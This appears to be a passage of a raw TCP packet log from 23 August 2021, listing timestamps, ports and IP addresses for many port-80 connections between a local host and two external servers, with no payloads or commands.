Aug 23, 2021 02:09:02.980750084 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.980796099 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.980829954 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:02.981036901 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.981312037 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:02.981383085 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.035976887 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.036010981 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.036091089 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.036134005 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.036439896 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.036473036 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.036611080 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.036633968 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.037070990 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.037166119 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.037574053 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.037667990 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.037709951 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.037714005 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.037782907 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.038150072 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.058152914 CEST	49792	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.059633017 CEST	49793	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.083477020 CEST	80	49792	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.083595037 CEST	49792	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.084762096 CEST	80	49793	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.084932089 CEST	49793	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.085932970 CEST	49793	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.092087984 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.092282057 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.092612028 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.092660904 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.092869997 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.092930079 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.093556881 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.093863964 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.093899012 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.093929052 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.111159086 CEST	80	49793	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.111670017 CEST	80	49793	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.111690998 CEST	80	49793	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.111814976 CEST	49793	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.148713112 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.148821115 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.149666071 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.149878025 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.149965048 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.149995089 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.150042057 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.150048018 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.150049925 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.150059938 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.151113033 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.205070972 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.205195904 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.205780029 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.205832958 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.205845118 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.205945015 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.206300020 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.206342936 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.206959963 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.227996111 CEST	49793	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.230914116 CEST	49794	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.253206015 CEST	80	49793	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.253324986 CEST	49793	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.257627964 CEST	80	49794	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.260507107 CEST	49794	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.260920048 CEST	49794	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.262551069 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.262653112 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.262955904 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.263221979 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.286072016 CEST	80	49794	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.286813974 CEST	80	49794	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.286834002 CEST	80	49794	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.286951065 CEST	49794	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.309660912 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.309751987 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.319315910 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.319339991 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.319349051 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.319441080 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.319494963 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.365720987 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.367907047 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.375458956 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.375488997 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.375502110 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.375520945 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.375618935 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.375657082 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.400015116 CEST	49794	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.401333094 CEST	49795	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.423806906 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.425296068 CEST	80	49794	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.425599098 CEST	49794	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.426446915 CEST	80	49795	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.426632881 CEST	49795	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.427843094 CEST	49795	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.431503057 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.453001976 CEST	80	49795	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.453547955 CEST	80	49795	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.453568935 CEST	80	49795	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.453634977 CEST	49795	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.556112051 CEST	49795	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.558613062 CEST	49796	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.581595898 CEST	80	49795	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.581746101 CEST	49795	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.583751917 CEST	80	49796	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.584322929 CEST	49796	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.598146915 CEST	49796	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.624356031 CEST	80	49796	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.625138044 CEST	80	49796	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.625180006 CEST	80	49796	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.625269890 CEST	49796	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.625318050 CEST	49796	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.679296017 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.736963034 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.737124920 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.747908115 CEST	49796	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.750281096 CEST	49797	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.773377895 CEST	80	49796	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.773732901 CEST	49796	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.775646925 CEST	80	49797	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.775938034 CEST	49797	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.776973963 CEST	49797	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.793313026 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.793361902 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:03.802301884 CEST	80	49797	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.803045034 CEST	80	49797	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.803073883 CEST	80	49797	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.803215027 CEST	49797	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.803308010 CEST	49797	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.915796995 CEST	49797	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.918289900 CEST	49798	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.929456949 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:03.941289902 CEST	80	49797	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.941497087 CEST	49797	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.943612099 CEST	80	49798	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.943742037 CEST	49798	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.944422007 CEST	49798	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.971914053 CEST	80	49798	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.972943068 CEST	80	49798	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.972955942 CEST	80	49798	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:03.973069906 CEST	49798	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:03.985491991 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.086632967 CEST	49798	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.087687969 CEST	49799	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.111982107 CEST	80	49798	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.112078905 CEST	49798	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.113843918 CEST	80	49799	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.114021063 CEST	49799	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.115045071 CEST	49799	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.142046928 CEST	80	49799	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.142575979 CEST	80	49799	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.142592907 CEST	80	49799	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.142695904 CEST	49799	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.241857052 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.259090900 CEST	49799	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.266334057 CEST	49800	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.284404993 CEST	80	49799	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.284578085 CEST	49799	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.291656971 CEST	80	49800	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.291795015 CEST	49800	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.293025017 CEST	49800	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.297961950 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.318289995 CEST	80	49800	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.319034100 CEST	80	49800	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.319050074 CEST	80	49800	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.319161892 CEST	49800	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.345386982 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.345511913 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.446852922 CEST	49800	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.449518919 CEST	49801	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.472771883 CEST	80	49800	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.472866058 CEST	49800	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.477931976 CEST	80	49801	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.478684902 CEST	49801	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.479715109 CEST	49801	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.504944086 CEST	80	49801	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.505719900 CEST	80	49801	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.505764961 CEST	80	49801	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.505836010 CEST	49801	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.505876064 CEST	49801	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.594629049 CEST	49801	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.596092939 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.619901896 CEST	80	49801	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.620513916 CEST	49801	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.620630026 CEST	49803	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.621356010 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.621540070 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.621953011 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.622087955 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.622303009 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.622482061 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.645802975 CEST	80	49803	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.645929098 CEST	49803	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.647017002 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647169113 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647492886 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647517920 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647542953 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647567987 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647579908 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.647591114 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647615910 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647625923 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.647633076 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.647640944 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647651911 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.647675991 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647696018 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.647706032 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.647726059 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.647772074 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.667870998 CEST	49803	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.672955036 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.672983885 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.672995090 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.673005104 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.673016071 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.673052073 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.673113108 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.673149109 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.673152924 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.673197985 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.673259020 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.673268080 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.673326969 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.674036026 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.674048901 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.674149036 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.674263000 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.693165064 CEST	80	49803	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.693721056 CEST	80	49803	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.693736076 CEST	80	49803	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.693861961 CEST	49803	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.693902016 CEST	49803	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.698550940 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.698573112 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.698596954 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.698607922 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.698622942 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.698642969 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.698657990 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.698684931 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.699332952 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699362040 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699397087 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699435949 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699455976 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699471951 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699486017 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699498892 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.699640036 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.724050045 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.724180937 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.725032091 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.725076914 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.725184917 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.725223064 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.725440979 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.725522041 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.730698109 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.733352900 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.750706911 CEST	80	49802	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.750812054 CEST	49802	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.786822081 CEST	80	49791	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.786998987 CEST	49791	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.794048071 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.794203043 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.794840097 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.795021057 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.795310020 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.795531988 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.810902119 CEST	49803	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.812585115 CEST	49805	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.836358070 CEST	80	49803	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.836431026 CEST	49803	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.838054895 CEST	80	49805	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.838140011 CEST	49805	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.839518070 CEST	49805	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.855047941 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.855186939 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.855530977 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.855607033 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.855756044 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.855814934 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.855993032 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.856054068 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.856276989 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.856338978 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.856403112 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.856473923 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.856509924 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.856565952 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.856638908 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.856693029 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.856750965 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.856794119 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.856914043 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.856966972 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.865295887 CEST	80	49805	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.866158009 CEST	80	49805	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.866174936 CEST	80	49805	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:04.866250992 CEST	49805	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.866270065 CEST	49805	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:04.917448997 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.917474031 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.917484045 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.917706013 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.918023109 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.918139935 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.918142080 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.918211937 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.918226004 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.918255091 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.918266058 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.918359041 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.918432951 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.978513956 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.978575945 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.978606939 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.978758097 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.978759050 CEST	49804	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:04.978955984 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.979208946 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.979320049 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.979355097 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.979496956 CEST	80	49804	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:04.982520103 CEST	49805	80	192.168.2.3	185.206.180.136
